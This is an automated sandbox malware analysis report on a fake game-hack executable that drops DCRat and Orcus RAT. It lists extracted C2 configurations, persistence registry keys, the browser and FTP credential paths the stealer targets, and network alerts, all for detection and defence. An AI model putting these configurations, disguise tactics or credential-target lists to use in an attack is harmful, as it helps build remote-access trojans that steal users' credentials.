Windows Analysis Report
GameHackBuild1.exe.bin.exe

Overview

General Information

Sample name: GameHackBuild1.exe.bin.exe
Analysis ID: 1590018
MD5: 35a0fbec2fc6d2a550a569719406d58d
SHA1: bc73001a0600313803d3594dc51d3d0813dbdec1
SHA256: 221ec8caee4804b4c9e4ced2e1f03be897bc1993d7898b2bdc00f90a093eb87d
Tags: AgentTesla, DCRat, exe, NyashTeam, user-MalHunter3

Detection

DCRat, Orcus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DCRat
Yara detected Orcus RAT
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Found Tor onion address
Found many strings related to Crypto-Wallets (likely being stolen)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • GameHackBuild1.exe.bin.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe" MD5: 35A0FBEC2FC6D2A550A569719406D58D)
    • wscript.exe (PID: 7572 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7692 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • runtimesvc.exe (PID: 4920 cmdline: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe" MD5: 00C4245522082B7F87721F9A26E96BA4)
          • csc.exe (PID: 8368 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 8376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 8460 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • MpDefenderProtector.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe" MD5: 10E817A4D5E216279A8DE8ED71C91044)
      • MpDefenderCoreProtion.exe (PID: 7932 cmdline: "C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe" MD5: 10E817A4D5E216279A8DE8ED71C91044)
        • RegAsm.exe (PID: 5520 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • GameHack.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe" MD5: BC7804FCA6DD09B4F16E86D80B8D28FA)
      • wscript.exe (PID: 7752 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 6896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • containerRuntime.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe" MD5: 52C95032FF8B8C3D4DFD98E51D8F6F58)
    • Solara.exe (PID: 7648 cmdline: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe" MD5: E8C32CC88DB9FEF57FD9E2BB6D20F70B)
      • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 7660 cmdline: wmic diskdrive get model,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • MpDefenderCoreProtion.exe (PID: 5456 cmdline: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe MD5: 10E817A4D5E216279A8DE8ED71C91044)
  • cleanup
Name: DCRat
Description: DCRat is a typical RAT that has been around since at least June 2019.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name: Orcus RAT
Description: Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat
Extracted DCRat configuration:
{"C2 url": "http://117813cm.n9shteam.in/ExternalRequest", "MUTEX": "DCR_MUTEX-KJuu1JY0vqv02KLL4nsh", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Extracted Orcus RAT configuration:
{"AutostartBuilderProperty": {"AutostartMethod": "Disable", "TaskSchedulerTaskName": "sudik", "TaskHighestPrivileges": "true", "AutoSteal": "true", "Inject": "true", "RegistryHiddenStart": "true", "RegistryKeyName": "Sudik", "TryAllAutostartMethodsOnFail": "true"}, "ChangeAssemblyInformationBuilderProperty": {"ChangeAssemblyInformation": "false", "AssemblyTitle": null, "AssemblyDescription": null, "AssemblyCompanyName": null, "AssemblyProductName": null, "AssemblyCopyright": null, "AssemblyTrademarks": null, "AssemblyProductVersion": "1.0.0.0", "AssemblyFileVersion": "1.0.0.0"}, "ChangeCreationDateBuilderProperty": {"IsEnabled": "false", "NewCreationDate": "2016-11-05T21:17:40"}, "ChangeIconBuilderProperty": {"ChangeIcon": "false", "IconPath": null}, "ClientTagBuilderProperty": {"ClientTag": "GameHack"}, "ConnectionBuilderProperty": {"IpAddresses": [{"Ip": "25350.client.sudorat.top", "Port": "25350"}, {"Ip": "25350.client.sudorat.ru", "Port": "25350"}, {"Ip": "31.44.184.52", "Port": "25350"}]}, "DataFolderBuilderProperty": {"Path": "%appdata%\\Windows\\Defender\\"}, "DefaultPrivilegesBuilderProperty": {"RequireAdministratorRights": "true"}, "DisableInstallationPromptBuilderProperty": {"IsDisabled": "true"}, "FrameworkVersionBuilderProperty": {"FrameworkVersion": "NET35"}, "HideFileBuilderProperty": {"HideFile": "true"}, "InstallationLocationBuilderProperty": {"Path": "%appdata%\\Windows\\Defender\\MpDefenderCoreProtion.exe"}, "InstallBuilderProperty": {"Install": "true"}, "KeyloggerBuilderProperty": {"IsEnabled": "false"}, "MutexBuilderProperty": {"Mutex": "sudo_06kkh814g4vz7sfklrh1emcow75dz383"}, "ProxyBuilderProperty": {"ProxyOption": "None", "ProxyAddress": null, "ProxyPort": "1080", "ProxyType": "2"}, "ReconnectDelayProperty": {"Delay": "10000"}, "RequireAdministratorPrivilegesInstallerBuilderProperty": {"RequireAdministratorPrivileges": "true"}, "RespawnTaskBuilderProperty": {"IsEnabled": "true", "TaskName": "MpDefenderProtector"}, "ServiceBuilderProperty": {"Install": "false"}, "SetRunProgramAsAdminFlagBuilderProperty": {"SetFlag": "true"}, "WatchdogBuilderProperty": {"IsEnabled": "false", "Name": "aga.exe", "WatchdogLocation": "AppData", "PreventFileDeletion": "false"}}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | JoeSecurity_OrcusRat | Yara detected Orcus RAT | J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | RAT_Orcus | unknown | J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifacts observed in infostealers | ditekSHen
      • 0x2ec750:$f1: FileZilla\recentservers.xml
      • 0x2ec284:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
      • 0x2ecae0:$b1: Chrome\User Data\
      • 0x2ecb4c:$b1: Chrome\User Data\
      • 0x2ecbfc:$b2: Mozilla\Firefox\Profiles
      • 0x2ec69c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      • 0x2f57c7:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      • 0x2ec44a:$b4: Opera Software\Opera Stable\Login Data
      • 0x2ec178:$b5: YandexBrowser\User Data\
      • 0x2ec1e4:$b5: YandexBrowser\User Data\
      • 0x2ecb94:$s1: key3.db
      • 0x2eccbe:$s4: logins.json
      • 0x2ebcfc:$a1: username_value
      • 0x2ebd1a:$a2: password_value
      • 0x2d0710:$a3: encryptedUsername
      • 0x2ecd0a:$a3: encryptedUsername
      • 0x2ce9da:$a4: encryptedPassword
      • 0x2ecd2e:$a4: encryptedPassword
C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_OrcusRat | Yara detected Orcus RAT | J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp | RAT_Orcus | unknown | J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
0000001A.00000002.1720636580.00000000025B1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
0000001A.00000002.1720636580.00000000029E3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Source | Rule | Description | Author | Strings
13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack | JoeSecurity_OrcusRat | Yara detected Orcus RAT | J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack | RAT_Orcus | unknown | J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack | INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifacts observed in infostealers | ditekSHen
                  • 0x2ea950:$f1: FileZilla\recentservers.xml
                  • 0x2ea484:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
                  • 0x2eace0:$b1: Chrome\User Data\
                  • 0x2ead4c:$b1: Chrome\User Data\
                  • 0x2eadfc:$b2: Mozilla\Firefox\Profiles
                  • 0x2ea89c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • 0x2f39c7:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • 0x2ea64a:$b4: Opera Software\Opera Stable\Login Data
                  • 0x2ea378:$b5: YandexBrowser\User Data\
                  • 0x2ea3e4:$b5: YandexBrowser\User Data\
                  • 0x2ead94:$s1: key3.db
                  • 0x2eaebe:$s4: logins.json
                  • 0x2e9efc:$a1: username_value
                  • 0x2e9f1a:$a2: password_value
                  • 0x2ce910:$a3: encryptedUsername
                  • 0x2eaf0a:$a3: encryptedUsername
                  • 0x2ccbda:$a4: encryptedPassword
                  • 0x2eaf2e:$a4: encryptedPassword
23.2.runtimesvc.exe.1ba70000.5.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
23.2.runtimesvc.exe.1ba70000.5.raw.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

                      System Summary

Source: File created
  Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
  Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe, ProcessId: 7620, TargetFilename: C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe
Source: Registry Key set
  Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
  Data: Details: "C:\Users\Default\PrintHood\SSblKNNQege.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe, ProcessId: 4920, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSblKNNQege
Source: Process started
  Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
  Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe", ParentImage: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe, ParentProcessId: 7292, ParentProcessName: GameHackBuild1.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" , ProcessId: 7572, ProcessName: wscript.exe
Source: Registry Key set
  Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
  Data: Details: "C:\Windows\Cursors\OfficeClickToRun.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe, ProcessId: 4920, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun
Source: Registry Key set
  Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
  Data: Details: explorer.exe, "C:\Program Files (x86)\msbuild\SSblKNNQege.exe", "C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe", "C:\Windows\L2Schemas\SSblKNNQege.exe", "C:\Recovery\SSblKNNQege.exe", "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\SSblKNNQege.exe", "C:\Program Files\Windows Portable Devices\SSblKNNQege.exe", "C:\Users\All Users\WindowsHolographicDevices\SSblKNNQege.exe", "C:\Program Files (x86)\microsoft office\SSblKNNQege.exe", "C:\Users\Default\Pictures\RuntimeBroker.exe", "C:\Windows\Cursors\OfficeClickToRun.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe, ProcessId: 4920, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started
  Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
  Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe", ParentImage: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe, ParentProcessId: 4920, ParentProcessName: runtimesvc.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", ProcessId: 8368, ProcessName: csc.exe
Source: Process started
  Author: frack113, Nasreddine Bencherchali
  Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 8368, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP", ProcessId: 8460, ProcessName: cvtres.exe
Source: Process started
  Author: Michael Haag
  Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe", ParentImage: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe, ParentProcessId: 7292, ParentProcessName: GameHackBuild1.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" , ProcessId: 7572, ProcessName: wscript.exe
Source: File created
  Author: frack113
  Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe, ProcessId: 4920, TargetFilename: C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline

                      Data Obfuscation

Source: Process started
  Author: Joe Security
  Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe", ParentImage: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe, ParentProcessId: 4920, ParentProcessName: runtimesvc.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", ProcessId: 8368, ProcessName: csc.exe
Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol
2025-01-13T13:35:58.469462+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.7:49853 | 37.44.238.250:80 | TCP
2025-01-13T13:36:13.751539+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.7:49907 | 37.44.238.250:80 | TCP
2025-01-13T13:36:34.528892+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.7:50015 | 37.44.238.250:80 | TCP
2025-01-13T13:37:23.993180+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.7:50039 | 37.44.238.250:80 | TCP
2025-01-13T13:36:23.086316+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7:49956 | 37.44.238.250:80 | TCP


                      AV Detection

Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\Default\Pictures\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Avira: detection malicious, Label: HEUR/AGEN.1309946
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\B2ESObyLKs.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | Avira: detection malicious, Label: HEUR/AGEN.1309946
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: 00000017.00000002.1959832866.000000001322D000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://117813cm.n9shteam.in/ExternalRequest", "MUTEX": "DCR_MUTEX-KJuu1JY0vqv02KLL4nsh", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack | Malware Configuration Extractor: OrcusRAT {"AutostartBuilderProperty": {"AutostartMethod": "Disable", "TaskSchedulerTaskName": "sudik", "TaskHighestPrivileges": "true", "AutoSteal": "true", "Inject": "true", "RegistryHiddenStart": "true", "RegistryKeyName": "Sudik", "TryAllAutostartMethodsOnFail": "true"}, "ChangeAssemblyInformationBuilderProperty": {"ChangeAssemblyInformation": "false", "AssemblyTitle": null, "AssemblyDescription": null, "AssemblyCompanyName": null, "AssemblyProductName": null, "AssemblyCopyright": null, "AssemblyTrademarks": null, "AssemblyProductVersion": "1.0.0.0", "AssemblyFileVersion": "1.0.0.0"}, "ChangeCreationDateBuilderProperty": {"IsEnabled": "false", "NewCreationDate": "2016-11-05T21:17:40"}, "ChangeIconBuilderProperty": {"ChangeIcon": "false", "IconPath": null}, "ClientTagBuilderProperty": {"ClientTag": "GameHack"}, "ConnectionBuilderProperty": {"IpAddresses": [{"Ip": "25350.client.sudorat.top", "Port": "25350"}, {"Ip": "25350.client.sudorat.ru", "Port": "25350"}, {"Ip": "31.44.184.52", "Port": "25350"}]}, "DataFolderBuilderProperty": {"Path": "%appdata%\\Windows\\Defender\\"}, "DefaultPrivilegesBuilderProperty": {"RequireAdministratorRights": "true"}, "DisableInstallationPromptBuilderProperty": {"IsDisabled": "true"}, "FrameworkVersionBuilderProperty": {"FrameworkVersion": "NET35"}, "HideFileBuilderProperty": {"HideFile": "true"}, "InstallationLocationBuilderProperty": {"Path": "%appdata%\\Windows\\Defender\\MpDefenderCoreProtion.exe"}, "InstallBuilderProperty": {"Install": "true"}, "KeyloggerBuilderProperty": {"IsEnabled": "false"}, "MutexBuilderProperty": {"Mutex": "sudo_06kkh814g4vz7sfklrh1emcow75dz383"}, "ProxyBuilderProperty": {"ProxyOption": "None", "ProxyAddress": null, "ProxyPort": "1080", "ProxyType": "2"}, "ReconnectDelayProperty": {"Delay": "10000"}, "RequireAdministratorPrivilegesInstallerBuilderProperty": {"RequireAdministratorPrivileges": "true"}, "RespawnTaskBuilderProperty": {"IsEnabled": "true", "TaskName": "MpDefenderProtector"}, "ServiceBuilderProperty": {"Install": "false"}, "SetRunProgramAsAdminFlagBuilderProperty": {"SetFlag": "true"}, "WatchdogBuilderProperty": {"IsEnabled": "false", "Name": "aga.exe", "WatchdogLocation": "AppData", "PreventFileDeletion": "false"}}
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exe | ReversingLabs: Detection: 78%
                      Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe | ReversingLabs: Detection: 67%
                      Source: C:\Program Files (x86)\Microsoft Office\SSblKNNQege.exe | ReversingLabs: Detection: 78%
